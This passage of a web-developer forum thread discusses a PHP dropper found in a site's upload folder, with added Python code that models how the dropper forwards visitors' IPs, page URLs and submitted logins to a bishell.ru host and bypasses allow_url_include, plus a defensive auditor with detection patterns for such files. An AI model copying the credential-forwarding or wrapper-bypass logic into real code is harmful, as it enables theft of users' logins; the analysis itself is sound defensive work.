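To make the decoded tail concrete, the Python below models what the dropper does per request. It is an added example, not code from the thread or from the malware: it mirrors the PHP logic for the URL that gets included (host from the outer $p plus ".users.bishell.ru"; query string with the visitor's IP as an unsigned integer, the infected page's host and URI base64-encoded, any POSTed l and p, and the log flag) and the $rkht decision between a plain http:// include and the script's own http2:// wrapper. The practical consequence the thread does not spell out: every visitor's IP and every login form submitted to an infected page is forwarded to that host, and turning off allow_url_include only changes which branch runs, because the self-registered wrapper is not subject to that setting. The function names, the sample IP and the sample form values are mine.

```python
import base64
import hashlib
import ipaddress

# Decoded from the dropper's base64 constants ("LnVzZXJzLmJpc2hlbGwucnU=").
C2_DOMAIN_SUFFIX = base64.b64decode("LnVzZXJzLmJpc2hlbGwucnU=").decode()   # ".users.bishell.ru"


def php_ip2long_unsigned(addr):
    """sprintf("%u", ip2long($addr)): dotted quad to unsigned 32-bit integer."""
    return int(ipaddress.IPv4Address(addr))


def user_auth_fragment(post):
    """The $user_auth piece: forwards POSTed l/p; with 'input' set, p is MD5'd and both base64'd."""
    if "l" not in post or "p" not in post:
        return ""
    if "input" in post:
        l = base64.b64encode(post["l"].encode()).decode()
        p = base64.b64encode(hashlib.md5(post["p"].encode()).hexdigest().encode()).decode()
        return "&l=%s&p=%s" % (l, p)
    return "&l=%s&p=%s" % (post["l"], post["p"])


def choose_scheme(php_version, allow_url_include, allow_url_fopen):
    """The $rkht logic: http:// only if both ini flags are on, else the self-registered http2://."""
    rkht = 1
    if tuple(int(x) for x in php_version.split(".")[:2]) >= (5, 2):
        rkht = 1 if allow_url_include else 0
    if rkht == 1:
        rkht = 1 if allow_url_fopen else 0
    return "http://" if rkht == 1 else "http2://"


def callback_url(p, remote_addr, server_name, request_uri, post,
                 php_version="5.3", allow_url_include=False, allow_url_fopen=True):
    """Rebuild the exact URL the dropper passes to include_once for one request."""
    # $log_flg is only assigned when log_flg is absent; otherwise it is undefined (empty).
    log_flg = "" if "log_flg" in post else "&log"
    v = (p + C2_DOMAIN_SUFFIX
         + "/?r_addr=" + str(php_ip2long_unsigned(remote_addr))
         + "&url=" + base64.b64encode((server_name + request_uri).encode()).decode()
         + user_auth_fragment(post) + log_flg)
    return choose_scheme(php_version, allow_url_include, allow_url_fopen) + v


if __name__ == "__main__":
    # Constructed request: a visitor logging in through an infected forum page.
    sample_post = {"l": "admin", "p": "hunter2"}
    print(callback_url("bfdhgzzazbzej", "203.0.113.7", "forum.example",
                       "/ucp.php?mode=login", sample_post))
    print(choose_scheme("5.3", allow_url_include=True, allow_url_fopen=True))
```

The r_addr and url parameters are what to search for if you have the outbound proxy or DNS logs for the web server; the host itself is the indicator to block.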
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Help in decoding XSS Script

Post by Mordred »

Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script, BTW, looks like it wants to do an RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.
prasant4u
Forum Newbie
Posts: 3
Joined: Tue Aug 10, 2010 12:44 am

Re: Help in decoding XSS Script

Post by prasant4u »

Thanks everyone for your help. :) I have disabled the url_include function on the server.
Sephern
Forum Commoner
Posts: 73
Joined: Sun Jan 04, 2009 4:44 pm

Re: Help in decoding XSS Script

Post by Sephern »

Mordred wrote:
Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script, BTW, looks like it wants to do an RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.
Thanks for your reply. So does this mean they got my FTP details? I have now moved from mod_php to FastCGI (with Apache suexec enabled), so my upload folders now have 755 permissions. Can only 777 folders have this type of security problem?
755 is read and execute, is it not?
If files from the 'upload' folder are included and have PHP code in them, that would explain how it was shelled.
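The cleanup step the thread circles around, as an added Python example (not from the posts): walk the upload tree and report what should never be there. It flags world-writable directories, .htaccess and PHP files inside the upload tree, PHP open tags in files with other extensions, and the content markers of this dropper (eval over a base64 blob, a self-registered stream wrapper, error_reporting(0)). The sample tree is constructed to mirror the first post, a 777 images folder holding base.php and a .htaccess beside a benign upload, plus a clean 755 folder; names are mine. One caveat on the 755 change: under suexec the PHP process runs as the same user that owns the upload directories, so 755 stops other local users from writing there but not the web application itself, and it does nothing about a PHP file that is already present; keeping PHP from executing in upload directories at all is the separate control.

```python
import os
import re
import stat
import tempfile

# Content markers taken from the dropper decoded in this thread.
MARKERS = {
    "eval over base64 blob": re.compile(rb"eval\s*\(\s*base64_decode\s*\("),
    "registers its own stream wrapper": re.compile(rb"stream_wrapper_register\s*\("),
    "silences errors": re.compile(rb"error_reporting\s*\(\s*0\s*\)"),
}
PHP_EXTENSIONS = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")


def audit_upload_tree(root):
    """Walk an upload tree and return (path relative to root, finding) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        mode = os.stat(dirpath).st_mode
        if mode & stat.S_IWOTH:
            findings.append((rel_dir, "world-writable directory (%o)" % (mode & 0o777)))
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            is_php_name = name.lower().endswith(PHP_EXTENSIONS)
            if name == ".htaccess":
                findings.append((rel, ".htaccess inside upload tree"))
            if is_php_name:
                findings.append((rel, "PHP file inside upload tree"))
            try:
                with open(path, "rb") as fh:
                    head = fh.read(1 << 20)   # first MiB is enough for a dropper stub
            except OSError:
                continue
            if b"<?php" in head and not is_php_name:
                findings.append((rel, "PHP open tag in a non-PHP file"))
            for label, pattern in MARKERS.items():
                if pattern.search(head):
                    findings.append((rel, label))
    return findings


def build_demo_tree():
    """Constructed sample tree (assumption, mirrors the first post): a 777 'images' folder
    with a dropper stub and a dropped .htaccess next to a real upload, and a clean 755 folder."""
    root = tempfile.mkdtemp(prefix="upload-audit-")
    images = os.path.join(root, "images")
    avatars = os.path.join(root, "avatars")
    os.mkdir(images)
    os.mkdir(avatars)
    with open(os.path.join(images, "base.php"), "w") as fh:
        fh.write('<?php error_reporting(0);$p="bfdhgzzazbzej";'
                 'eval(base64_decode("Y2xhc3MgbmV3aHR0cHs=")); ?>')
    with open(os.path.join(images, ".htaccess"), "w") as fh:
        fh.write("# placeholder: the dropped .htaccess contents were not posted\n")
    with open(os.path.join(images, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"\x00" * 64)   # JPEG header, no PHP
    with open(os.path.join(avatars, "readme.txt"), "w") as fh:
        fh.write("clean\n")
    os.chmod(images, 0o777)
    os.chmod(avatars, 0o755)
    return root


if __name__ == "__main__":
    for path, why in audit_upload_tree(build_demo_tree()):
        print("%-22s %s" % (path, why))
```

Point audit_upload_tree at the real upload root and treat every PHP file or .htaccess it reports as something to quarantine for analysis rather than delete outright; the file timestamps and the web server access log around them are what tell you how the files arrived.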
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Help in decoding XSS Script

Post by Mordred »

I didn't say your diagnosis was wrong, only that it wasn't the only possible one.